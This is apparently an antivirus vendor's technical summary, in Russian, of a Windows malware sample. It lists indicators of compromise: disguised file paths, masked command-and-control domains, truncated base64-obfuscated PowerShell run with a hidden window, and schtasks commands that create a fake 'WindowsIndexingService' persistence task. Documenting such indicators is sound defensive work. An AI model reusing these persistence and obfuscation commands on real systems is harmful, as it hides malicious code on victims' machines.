Техническая информация
- <SYSTEM32>\tasks\windowsindexingservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsindexingservice.lnk
- C:\users\public\libraries\thumbcache_33.db
- %TEMP%\xafx916.1.tmp
- C:\users\public\libraries\thumbcache_33.db
- 'ww#.##gventures.com':80
- 'ot####kwotm5.top':80
- http://ot####kwotm5.top/
- DNS ASK ww#.##gventures.com
- DNS ASK zg####kwotm5.top
- DNS ASK ot####kwotm5.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyB...
- '<SYSTEM32>\schtasks.exe' /delete /TN WindowsIndexingService /f
- '<SYSTEM32>\schtasks.exe' /delete /TN "Windows Indexing Service" /f
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 20 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"